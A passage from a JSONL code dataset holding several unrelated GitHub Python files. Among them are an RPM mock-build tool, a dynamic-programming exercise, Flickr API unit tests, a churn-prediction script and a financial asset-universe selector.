0:\n print(f\"no mbuild log found! bye~\")\n return\n for l in logs:\n if os.path.isfile(l):\n os.remove(l)\n print(f\"delete {l} done!\")\n print(f\"clean done\")\n\n\ndef mockbuild_per_srpm(args, srpm):\n srpm_path = os.path.abspath(srpm)\n\n # 选择输出目录\n if not args.output:\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd(\n [\"rpm\", \"-qp\", \"--nosignature\", \"--nodigest\", \"--queryformat\", \"%{NAME}\", srpm_path],\n print_output=False\n )\n if ret != 0:\n msg = f\" query srpm file ret is not zero [{ret}] {stderr}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm_path)\n output_dir = os.path.join(topdir, srpm_name)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, exist_ok=True)\n logger.info(f\"output_dir dir : {output_dir}\")\n else:\n try:\n os.makedirs(args.output, exist_ok=True)\n except Exception as e:\n msg = f\"failed to create {args.output}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n exit(1)\n output_dir = args.output\n\n if not args.root:\n root = \"rocky-8-x86_64\"\n else:\n root = args.root\n\n # mock编译\n cmd = [\n \"/usr/bin/mock\",\n \"--root\", f\"{root}\",\n \"--rebuild\", f\"{srpm_path}\",\n \"--resultdir\", f\"{output_dir}\",\n \"--verbose\"\n ]\n logger.info(f\"run cmd {' '.join(cmd)}\")\n ret, stdout, stderr = do_exe_cmd(cmd, print_output=True, shell=False)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(output_dir, \"mbuild_mock_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n do_sendmsg(args, ret=ret)\n return\n buildlog = os.path.join(output_dir, \"mbuild_mock.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n\n@timer\ndef handle_mock(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm:\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n mockbuild_per_srpm(args, srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n mockbuild_per_srpm(args, srpm_path)\n\n do_sendmsg(args)\n\n\ndef handle_check(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n def find_rpm_files(dir_path):\n flag = False\n rpms = []\n for entry in os.scandir(dir_path):\n if entry.is_file() and entry.name.endswith(\".rpm\"):\n flag = True\n rpms.append(os.path.basename(entry.path))\n elif entry.is_dir():\n find_rpm_files(entry.path)\n if flag:\n print(f\"[+] {os.path.abspath(dir_path)}\")\n for r in rpms:\n print(f\"\\t[-] {r}\")\n\n find_rpm_files(workdir)\n\n\ndef main():\n global CURRENT_VERSION\n check_python_version()\n\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-v\", \"--version\", action=\"store_true\",\n help=\"show program's version number and exit\")\n parser.add_argument(\"-h\", \"--help\", action=\"store_true\",\n help=\"show this help message and exit\")\n\n subparsers = parser.add_subparsers()\n\n # 定义base命令用于集成\n parent_parser = argparse.ArgumentParser(add_help=False, description=\"mbuild - a tool for kernel development\")\n parent_parser.add_argument(\"-V\", \"--verbose\", default=None, action=\"store_true\", help=\"show verbose output\")\n parent_parser.add_argument(\"-j\", \"--job\", default=os.cpu_count(), type=int, help=\"job count\")\n parent_parser.add_argument(\"-o\", \"--output\", default=None, help=\"output dir path\")\n parent_parser.add_argument(\"-w\", \"--workdir\", default=\".\", help=\"setup workdir\")\n parent_parser.add_argument('-d', '--debug', default=None, action=\"store_true\", help=\"enable debug output\")\n parent_parser.add_argument('-q', '--quiet', default=False, action=\"store_true\", help=\"keep quiet, no msg send\")\n\n # 添加子命令 stat\n parser_stat = subparsers.add_parser('stat', parents=[parent_parser])\n parser_stat.set_defaults(func=handle_stat)\n\n # 添加子命令 build\n parser_build = subparsers.add_parser('build', parents=[parent_parser])\n parser_build.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_build.set_defaults(func=handle_build)\n\n # 添加子命令 localinstall\n parser_localinstall = subparsers.add_parser('localinstall', parents=[parent_parser])\n parser_localinstall.set_defaults(func=handle_localinstall)\n\n # 添加子命令 localbuild\n parser_localbuild = subparsers.add_parser('localbuild', parents=[parent_parser])\n parser_localbuild.set_defaults(func=handle_localbuild)\n\n # 添加子命令 handle_mock\n parser_mock = subparsers.add_parser('mock', parents=[parent_parser])\n parser_mock.add_argument('-r', '--root', default=None, help=\"specific mock config\")\n parser_mock.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_mock.set_defaults(func=handle_mock)\n\n # 添加子命令 clean\n parser_clean = subparsers.add_parser('clean', parents=[parent_parser])\n parser_clean.set_defaults(func=handle_clean)\n\n # 添加子命令 check\n parser_check = subparsers.add_parser('check', parents=[parent_parser])\n parser_check.set_defaults(func=handle_check)\n\n # 开始解析命令\n args = parser.parse_args()\n\n # 解析命令后解析配置文件,合并两者\n for filename in os.listdir('.'):\n if filename.endswith(\".mbuild\"):\n print(\"load config file %s\" % filename)\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n match = re.match(r'(\\w+)\\s*=\\s*([\\w/.-]+)', line)\n if match:\n key = match.group(1)\n value = match.group(2)\n # 如果命令行没有定义key,则使用配置中的KV\n if not hasattr(args, key):\n setattr(args, key, value)\n # 如果命令行未打开选项,但配置中打开,则使用配置中的KV\n if getattr(args, key) is None:\n setattr(args, key, value)\n\n if args.version:\n print(\"mbuild %s\" % CURRENT_VERSION)\n sys.exit(0)\n elif args.help or len(sys.argv) < 2:\n parser.print_help()\n sys.exit(0)\n else:\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yifengyou/mbuild","sub_path":"mbuild.py","file_name":"mbuild.py","file_ext":"py","file_size_in_byte":22417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73408741449","text":"\"\"\"\n못생긴 수(31p) \n\n못생긴 수란 오직 2, 3, 5만을 소인수로 가지는 수를 의미한다. 1은 못생긴 수라고 가정한다. 이때 n번째 못생긴 수를 찾는 프로그램을 작성하시오. 예를 들어 11번째 못생긴 수는 15입니다.\n(1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, ...)\n\n입력\n첫째 줄에 n이 입력(1부터 1000까지)\n\n출력\nn번째 못생긴 수 출력\n\"\"\"\n\nn=int(input())\n\ndp=[0]*n\ndp[0]=1\n\ni2,i3,i5=0,0,0\nnext2,next3,next5=2,3,5\n\nfor i in range(1,n):\n\tdp[i]=min(next2,next3,next5)\n\n\t#못생긴 수에 2 or 3 or 5를 곱한 수도 못생긴 수\n\n\tif dp[i]==next2:\n\t\ti2+=1\n\t\tnext2=dp[i2]*2\n\tif dp[i]==next3:\n\t\ti3+=1\n\t\tnext3=dp[i3]*3\n\tif dp[i]==next5:\n\t\ti5+=1\n\t\tnext5=dp[i5]*5\n\nprint(dp[n-1])\n\t\t","repo_name":"YoungWoongJoo/Learning-Algorithm-With-Python","sub_path":"Dynamic Programming/practice5.py","file_name":"practice5.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39027666041","text":"from data_loading import gazeRE_DataLoader\nfrom features.feature_extractor import LongestVisitFeatureExtractor, extract_training_data\n\nif __name__ == '__main__':\n # Set the minimal number of fixations for a visit and the minimal visit duration to be considered\n min_fixations = 0\n min_visit_duration = 3\n\n # Set the feature export directory\n target_dir = \"./\"\n\n # Intialize the gazeRE_Dataloader which loads the dataset\n dataloader = gazeRE_DataLoader(data_dir=\"data\", googleNQ=True, gREL=True)\n\n # Initialize the FeatureExtractor with LongestVisitFeatureExtractor which takes the longest visit for each paragraph\n feature_extractor = LongestVisitFeatureExtractor(\n min_visit_duration=min_visit_duration, min_fixations=min_fixations, screen_width=2560, screen_height=1440\n )\n\n # Extract the feature file for the g-REL corpus\n d_grel = extract_training_data(study_data=dataloader.grel, target_dir=target_dir,\n feature_extractor=feature_extractor)\n\n # Extract the feature file for the Google NQ corpus\n d_nq = extract_training_data(study_data=dataloader.google_nq, target_dir=target_dir,\n feature_extractor=feature_extractor)\n","repo_name":"DFKI-Interactive-Machine-Learning/gazeRE-dataset","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41013889408","text":"import flickr_api as f\nimport unittest\n\n\nclass TestPhotoSizes(unittest.TestCase):\n def test_video_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_none_entry(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n 700:\n dict(\n media=\"video\",\n url=\"v@url2\",\n source=\"v@source2\",\n width=None,\n height=None)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n )\n },\n media=\"video\")\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source\", \"HD MP4\"))\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source.mp4\", \"HD MP4\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"HD MP4\"))\n\n def test_photo_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p/source.jpg\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source\", \"Large\"))\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source.jpg\", \"Large\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"Large\"))\n\n\n def test_photo_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Large\", p._getLargestSizeLabel())\n\n def test_photo_largest_size_original(self):\n \"\"\"Test that the original size is returned if it is as big as the largest size\"\"\"\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000),\n \"Original\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Original\", p._getLargestSizeLabel())\n\n def test_parse_inline_sizes(self):\n self.maxDiff = None\n sizes = f.objects._parse_inline_sizes({\n 'title':\n 'Noir comme le soleil',\n 'owner':\n f.objects.Person(id=\"qwerty\", token=\"abcde\"),\n 'id':\n 16180339,\n 'ispublic':\n True,\n 'isfriend':\n False,\n 'isfamily':\n False,\n 'url_c':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'height_c':\n 534,\n 'width_c':\n '800',\n 'url_l':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'height_l':\n '684',\n 'width_l':\n '1024',\n 'url_o':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'height_o':\n '4016',\n 'width_o':\n '6016',\n 'media':\n 'photo',\n })\n self.assertEqual({\n 'Original': {\n 'label':\n 'Original',\n 'width':\n '6016',\n 'height':\n '4016',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/o/',\n 'media':\n 'photo'\n },\n 'Medium 800': {\n 'label':\n 'Medium 800',\n 'width':\n '800',\n 'height':\n 534,\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/c/',\n 'media':\n 'photo'\n },\n 'Large': {\n 'label':\n 'Large',\n 'width':\n '1024',\n 'height':\n '684',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/l/',\n 'media':\n 'photo'\n },\n }, sizes)\n","repo_name":"alexis-mignon/python-flickr-api","sub_path":"test/test_parse_sizes.py","file_name":"test_parse_sizes.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"16"} +{"seq_id":"41793445934","text":"import os.path\n\nimport yaml\n\nfrom agents.agents_factory import create_agent_by_type\nfrom agents.base_agent import BASE_AGENT_TYPE\nfrom config.constants import DEFAULT_START_PROMPT_PATH, INITIAL_USER_INPUT, PRESETS_DIR\n\n\nclass AgentConfig:\n # consturctor\n def __init__(self, commands_set_path=None,\n model='gpt-3.5-turbo', max_tokens=4000,\n temperature=0.1, top_p=1, frequency_penalty=0, presence_penalty=0,\n include_constraints_resources_prompt=True, include_response_format_prompt=True,\n include_commands_set=True, save_model=True, autonomous=False, type=BASE_AGENT_TYPE,\n prompt_start_path=DEFAULT_START_PROMPT_PATH,\n default_user_input=INITIAL_USER_INPUT, max_personal_goals=5):\n\n if not prompt_start_path:\n prompt_start_path = DEFAULT_START_PROMPT_PATH\n\n self.config_map = {\n 'type': type,\n 'model': model,\n 'top_p': top_p,\n 'save_model': save_model,\n 'autonomous': autonomous,\n 'max_tokens': max_tokens,\n 'temperature': temperature,\n 'prompt_start_path': prompt_start_path,\n 'presence_penalty': presence_penalty,\n 'frequency_penalty': frequency_penalty,\n 'commands_set_path': commands_set_path,\n 'default_user_input': default_user_input,\n 'max_personal_goals': max_personal_goals,\n 'include_commands_set': include_commands_set,\n 'include_response_format_prompt': include_response_format_prompt,\n 'include_constraints_resources_prompt': include_constraints_resources_prompt,\n\n }\n\n def get(self, key):\n return self.config_map[key]\n\n def to_dict(self):\n return self.config_map\n\n def __dict__(self):\n return self.config_map\n\n @staticmethod\n def from_dict(dict_input):\n return AgentConfig(**dict_input)\n\n @staticmethod\n def from_preset(name):\n path = os.path.join(PRESETS_DIR, name)\n\n if not os.path.exists(path):\n raise Exception(\"Preset file does not exist\")\n\n with open(path, 'r') as stream:\n try:\n preset = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n raise Exception(\"Error loading preset file: \" + str(exc))\n\n config = preset['config']\n\n name = preset['name']\n role = preset['role']\n agent_type = config['type']\n\n return create_agent_by_type(name, role, config, agent_type)\n","repo_name":"SherifNeamatalla/hal9000_world","sub_path":"agents/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"36337865101","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.tree import export_graphviz\r\nfrom sklearn import tree\r\nfrom io import StringIO\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom matplotlib import pyplot as plt\r\nimport graphviz\r\n\r\ntc = pd.read_csv('./customer_churn.csv')\r\n\r\n# print(\"Row:\", tc.shape[0])\r\n# print(\"\\nColumn:\", tc.shape[1])\r\n# print(\"\\nFeatures: \\n\", tc.columns.tolist())\r\n# print(\"\\nMissing Values: \\n\", tc.isnull().sum().values.sum())\r\n# print(\"\\nUnique Values: \\n\", tc.nunique())\r\n\r\ntc['TotalCharges'] = tc['TotalCharges'].replace(\" \", np.nan)\r\ntc =tc[tc['TotalCharges'].notnull()]\r\ntc= tc.reset_index()[tc.columns]\r\ntc['TotalCharges'] = tc['TotalCharges'].astype(float)\r\n# tc.head()\r\n\r\nreplace_cols = ['OnlineSecurity', 'OnlineBackup', 'DeviceProtection',\r\n 'TechSupport','StreamingTV', 'StreamingMovies']\r\nfor i in replace_cols:\r\n tc[i] = tc[i].replace({\"No internet service\" : \"No\"})\r\n# print(tc['OnlineSecurity'].head(15))\r\n\r\ntc[\"SeniorCitizen\"] = tc[\"SeniorCitizen\"].replace({1:\"Yes\", 0:\"No\"})\r\n\r\ndef tenure_cat(tc):\r\n \r\n if tc[\"tenure\"] <= 12:\r\n return \"Tenure_0-12\"\r\n \r\n elif (tc[\"tenure\"] > 12) & (tc[\"tenure\"] <= 24 ):\r\n return \"Tenure_12-24\"\r\n \r\n elif (tc[\"tenure\"] > 24) & (tc[\"tenure\"] <= 48) :\r\n return \"Tenure_24-48\"\r\n \r\n elif (tc[\"tenure\"] > 48) & (tc[\"tenure\"] <= 60) :\r\n return \"Tenure_48-60\"\r\n \r\n elif tc[\"tenure\"] > 60 :\r\n return \"Tenure_gt_60\"\r\n \r\ntc[\"tenure_grp\"] = tc.apply(lambda tc:tenure_cat(tc),\r\n axis = 1)\r\n\r\n#customer id col\r\nId_col = ['customerID']\r\n#Target columns\r\ntarget_col = [\"Churn\"]\r\n#categorical columns\r\ncat_cols = tc.nunique()[tc.nunique() < 6].keys().tolist()\r\ncat_cols = [x for x in cat_cols if x not in target_col]\r\n# print(cat_cols)\r\n\r\n#numerical columns\r\nnum_cols = [x for x in tc.columns if x not in cat_cols + target_col + Id_col]\r\n\r\n#Binary columns with 2 values\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\n# print(\" \")\r\n\r\nmulti_cols = [i for i in cat_cols if i not in bin_cols]\r\n\r\n#Label encoding Binary columns\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n#Duplicating columns for multi value columns\r\ntc = pd.get_dummies(data = tc,columns = multi_cols )\r\n# print(tc.head())\r\n\r\nstd = StandardScaler()\r\nscaled = std.fit_transform(tc[num_cols])\r\nscaled = pd.DataFrame(scaled,columns=num_cols)\r\n# print(scaled)\r\n\r\ntc = tc.drop(columns=['tenure_grp_Tenure_12-24', 'tenure_grp_Tenure_0-12', 'tenure_grp_Tenure_24-48', 'tenure_grp_Tenure_48-60', 'tenure_grp_Tenure_gt_60'])\r\n\r\ndf_tc_og = tc.copy()\r\ntc = tc.drop(columns = num_cols,axis = 1)\r\ntc = tc.merge(scaled,left_index=True,right_index=True,how = \"left\")\r\n\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n# print(tc.head())\r\n# print(tc.columns)\r\n\r\nId_col = ['customerID']\r\ntarget_col = ['Churn']\r\n\r\n# print(tc[\"tenure_grp\"])\r\n\r\ncat_cols = tc.nunique()[tc.nunique() < 6]\r\n# print(cat_cols)\r\n\r\ncols = [i for i in tc.columns if i not in Id_col + target_col ]\r\n# print(cols)\r\n\r\nx = df_tc_og[cols]\r\ny = df_tc_og[target_col]\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size = 0.2)\r\n\r\n# print(tc)\r\nmodel_dt_2 = DecisionTreeClassifier(random_state = 1, max_depth = 2)\r\nmodel_dt_2.fit(x_train, y_train)\r\nmodel_dt_2_score_train = model_dt_2.score(x_train, y_train)\r\nprint(\"Training Score depth-2 : \", model_dt_2_score_train)\r\nmodel_dt_2_score_test = model_dt_2.score(x_test, y_test)\r\nprint(\"Testing Score depth-2 : \", model_dt_2_score_test)\r\n\r\n# depth-8\r\nmodel_dt_8 = DecisionTreeClassifier(random_state=1, max_depth=8, criterion = \"entropy\")\r\nmodel_dt_8.fit(x_train, y_train)\r\nmodel_dt_8_score_train = model_dt_8.score(x_train, y_train)\r\nprint(\"Training score depth-8 : \",model_dt_8_score_train)\r\nmodel_dt_8_score_test = model_dt_8.score(x_test, y_test)\r\nprint(\"Testing score depth-8 : \",model_dt_8_score_test)\r\n\r\ndot_data = tree.export_graphviz(model_dt_8, out_file=None, \r\n feature_names=cols, \r\n class_names=target_col,\r\n filled=True)\r\n\r\n# Draw graph\r\ngraph = graphviz.Source(dot_data, format=\"png\") \r\ngraph","repo_name":"RathodKaransinh/Telco-Customer-Churn-Analysis","sub_path":"cust_churn_analysis.py","file_name":"cust_churn_analysis.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27572327847","text":"from threading import Thread\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef main():\r\n print(\"Start Fishing Trip.\")\r\n fish_on = randint(1, 10)\r\n\r\n setup_thread = Thread(target=setup_rig)\r\n cast_thread = Thread(target=cast_line)\r\n hook_thread = Thread(target=hook_fish, args=(fish_on,))\r\n\r\n setup_thread.start()\r\n cast_thread.start()\r\n hook_thread.start()\r\n\r\n setup_thread.join()\r\n cast_thread.join()\r\n hook_thread.join()\r\n\r\n if fish_on < 4:\r\n print(\"That didn't take long.\")\r\n elif fish_on in range(4, 8):\r\n print(\"Good day to fish.\")\r\n else:\r\n print(\"Seemed like nothing was going to bite today.\")\r\n\r\n print(\"Fishing Trip complete!\")\r\n\r\n\r\ndef setup_rig():\r\n print(\"Setup saltwater fishing rig.\")\r\n\r\n\r\ndef cast_line():\r\n print(\"Cast line and wait...\")\r\n\r\n\r\ndef hook_fish(wait):\r\n sleep(wait)\r\n print(\"Set hook and reel in fish.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"k3rl15/skill_captain_python_advanced","sub_path":"Day 5/concurrency_multithreading.py","file_name":"concurrency_multithreading.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5185104221","text":"from abc import ABCMeta, abstractmethod\nfrom dateutil import rrule\nimport datetime\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nimport alphai_calendars as mcal\n\nfrom alphai_feature_generation.cleaning import (\n select_between_timestamps,\n remove_duplicated_symbols_ohlcv,\n slice_data_dict\n)\n\nlogger = logging.getLogger(__name__)\n\nMETHOD_FIXED = 'fixed'\nMETHOD_ANNUAL = 'annual'\nMETHOD_LIQUIDITY = 'liquidity'\nMETHOD_LIQUIDITY_DAY = 'liquidity_day'\nMETHOD_FIXED_HISTORICAL = 'fixed_historical'\nHISTORICAL_UNIVERSE_COLUMNS = ('start_date', 'end_date', 'assets')\nUPDATE_FREQUENCIES = ('daily', 'weekly', 'monthly', 'yearly')\nFREQUENCY_RRULE_MAP = {'daily': rrule.DAILY, 'weekly': rrule.WEEKLY, 'monthly': rrule.MONTHLY, 'yearly': rrule.YEARLY}\nOHLCV = ('open', 'high', 'low', 'close', 'volume')\n\n\nclass AbstractUniverseProvider(metaclass=ABCMeta):\n @abstractmethod\n def get_historical_universes(self, data_dict):\n \"\"\"\n Get a dataframe with arrays of all the relevant equities between two dates, categorised by date ranges.\n :param data_dict: dict of dataframes\n :return: Dataframe with three columns ['start_date', 'end_date', 'assets']\n \"\"\"\n raise NotImplementedError\n\n\nclass VolumeUniverseProvider(AbstractUniverseProvider):\n def __init__(self,\n n_assets,\n ndays_window,\n update_frequency,\n calendar_name,\n dropna\n ):\n \"\"\"\n Provides assets according to an input universe dictionary indexed by year\n :param nassets: Number of assets to select\n :param ndays_window: Number of days over which to calculate the period liquidity\n :param update_frequency: str in ['daily', 'weekly', 'monthly', 'yearly']: updates of the historical universe\n :param exchange: the name of the calendar\n :param dropna: if True drops columns containing any nan after gaps-filling\n\n \"\"\"\n self._nassets = n_assets\n self._ndays_window = ndays_window\n self._update_frequency = update_frequency\n self._dropna = dropna\n\n self._exchange_calendar = mcal.get_calendar(calendar_name)\n\n self._nminutes_window = self._ndays_window * self._exchange_calendar.get_minutes_in_one_day()\n self._rrule = FREQUENCY_RRULE_MAP[self._update_frequency]\n\n def _get_universe_at(self, date, data_dict):\n assert (type(date) == datetime.date) or (type(date) == pd.Timestamp)\n\n selected_daily_data_dict = slice_data_dict(data_dict, slice_start=-self._ndays_window)\n assert len(selected_daily_data_dict['volume']) == self._ndays_window\n\n no_duplicates_data_dict = remove_duplicated_symbols_ohlcv(selected_daily_data_dict)\n universe_at_date = np.array(list(no_duplicates_data_dict['volume'].sum().sort_values(ascending=False).index))\n\n return universe_at_date[:self._nassets]\n\n def get_historical_universes(self, data_dict):\n\n historical_universes = pd.DataFrame(columns=HISTORICAL_UNIVERSE_COLUMNS)\n relevant_dict = {k: data_dict[k] for k in ('volume', 'close')}\n relevant_dict['volume'] = relevant_dict['volume'].resample('1D').sum().dropna(axis=[0, 1], how='all')\n relevant_dict['close'] = relevant_dict['close'].resample('1D').last().dropna(axis=[0, 1], how='all')\n\n data_timezone = relevant_dict['volume'].index.tz\n start_date = relevant_dict['volume'].index[self._ndays_window + 1]\n end_date = relevant_dict['volume'].index[-1]\n\n rrule_dates = list(rrule.rrule(self._rrule, dtstart=start_date, until=end_date))\n rrule_dates[-1] = end_date\n\n if len(rrule_dates) > 1:\n for idx, (period_start_date, period_end_date) in enumerate(zip(rrule_dates[:-1], rrule_dates[1:])):\n logger.debug('Calculating historical universe from: {} - {}'.format(str(period_start_date),\n str(period_end_date)))\n\n end_timestamp = pd.Timestamp(period_start_date, tz=data_timezone)\n\n historical_universes.loc[idx] = [\n period_start_date.date(),\n period_end_date.date(),\n self._get_universe_at(period_start_date.date(),\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n historical_universes.iloc[-1]['end_date'] = end_date.date()\n\n elif len(rrule_dates) == 1:\n end_timestamp = pd.Timestamp(start_date, tz=data_timezone)\n historical_universes.loc[0] = [\n start_date.date(),\n end_date.date(),\n self._get_universe_at(start_date,\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n return historical_universes\n","repo_name":"alpha-i/library-feature-generation","sub_path":"alphai_feature_generation/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33242643589","text":"import os\r\nimport sys\r\nfrom src.exceptions import CustomException\r\nfrom src.logger import logging\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom src.components.data_transformation import DataTransformation, DataTransformationConfig\r\nfrom dataclasses import dataclass\r\nfrom src.components.model_training import Trained_Model\r\n\r\n@dataclass\r\nclass DataIngestionConf:\r\n train_data_path = os.path.join('artifacts','train.csv')\r\n test_data_path = os.path.join('artifacts','test.csv')\r\n raw_data_path = os.path.join('artifacts','raw.csv')\r\n\r\nclass DataIngestion:\r\n def __init__(self):\r\n self.ingestion_conf = DataIngestionConf()\r\n \r\n def initiate_data(self):\r\n logging.info(\"We have started the data ingestion part now...\")\r\n try:\r\n df = pd.read_csv(\"C:/Users/Yashkumar Dubey/Documents/Desktop1/youtube/ML CICD Pipe/notebooks/data/laptop_data_cleaned.csv\")\r\n logging.info(\"Reaing the Dataset as Dataframe...\")\r\n os.makedirs(os.path.dirname(self.ingestion_conf.train_data_path),exist_ok=True)\r\n df.to_csv(self.ingestion_conf.raw_data_path,index=False,header=True)\r\n logging.info(\"Train test split is initiated...\")\r\n train_set,test_set = train_test_split(df,test_size=0.2,random_state=52)\r\n train_set.to_csv(self.ingestion_conf.train_data_path,index=False,header=True)\r\n test_set.to_csv(self.ingestion_conf.test_data_path,index=False,header=True)\r\n logging.info(\"Ingestion is completed\")\r\n return(\r\n self.ingestion_conf.train_data_path,\r\n self.ingestion_conf.test_data_path\r\n\r\n )\r\n except Exception as e:\r\n raise CustomException(e,sys)\r\n \r\n\r\nif __name__==\"__main__\":\r\n obj = DataIngestion()\r\n train_data,test_data = obj.initiate_data()\r\n transform = DataTransformation()\r\n new_train_data,new_test_data,new_y_train,new_y_test = transform.initiate_data_transformation(train_data,test_data)\r\n modeltrainer=Trained_Model()\r\n 